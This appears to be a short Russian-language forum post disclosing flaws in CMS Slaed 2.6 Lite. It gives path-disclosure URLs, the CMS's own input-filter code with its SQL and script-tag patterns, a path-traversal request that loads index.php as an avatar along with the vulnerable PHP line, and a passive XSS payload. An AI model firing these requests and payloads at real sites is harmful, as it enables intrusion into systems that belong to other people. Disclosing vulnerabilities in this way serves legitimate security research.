CMS Slaed 2.6 Lite Раскрытие путей /index.php?name=Html_Content&op[]=page /index.php?name=Account&op=info&uname[]=123 Уязвим файл /function/security.php Код: PHP: foreach ($_GET as $var_name=>$var_value) { if (preg_match("/<.*?(script|body|object|iframe|applet|meta|style|form|img|onmouseover).*?>/i", urldecode($var_value)) || preg_match("/\([^>]*\"?[^)]*\)/", $var_value) || preg_match("/\"|\'/", $var_value)) warn_report("HTML in GET - ".$var_name." = ". $var_value.""); if ($security_url_get == 1) { if (preg_match("/^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)/i", $var_value)) warn_report("URL in GET - ".$var_name." = ". $var_value); } $security_string = "/UNION|OUTFILE|SELECT|ALTER|INSERT|DROP|".$prefix."_admins|".$prefix."_users|ModAdmin|SaveAdmin|EditAdmin|DelAdmin/i"; $security_decode = base64_decode($var_value); if (preg_match($security_string, $security_decode)) hack_report("Hack base64 in GET - ".$var_name." = ". $var_value.""); if (preg_match($security_string, $var_value)) hack_report("Hack in GET - ".$var_name." = ". $var_value.""); $security_slash = preg_replace("/\/\*.*?\*\//", "", $var_value); if (preg_match($security_string, $security_slash)) hack_report("Hack in GET - ".$var_name." = ". $var_value.""); } Незнаю даже как назвать. Вообщем. /index.php?name=Account&op=saveavatar&category=2&avatar=../../../index.php и в аватарке будет загружатся index.php Уязвимый код: PHP: $user_avatar = ($userinfo['user_avatar'] && file_exists("".$adirectory."/".$userinfo['user_avatar']."")) ? "<img src=\"".$adirectory."/".$userinfo['user_avatar']."\" alt=\"$user_name\" title=\"$user_name\" />" : "<img src=\"".$adirectory."/00.gif\" alt=\"$user_name\" title=\"$user_name\" />"; Возможно ещё что нибудь найду. XSS (Пассивная) //"><script>alert();</script>
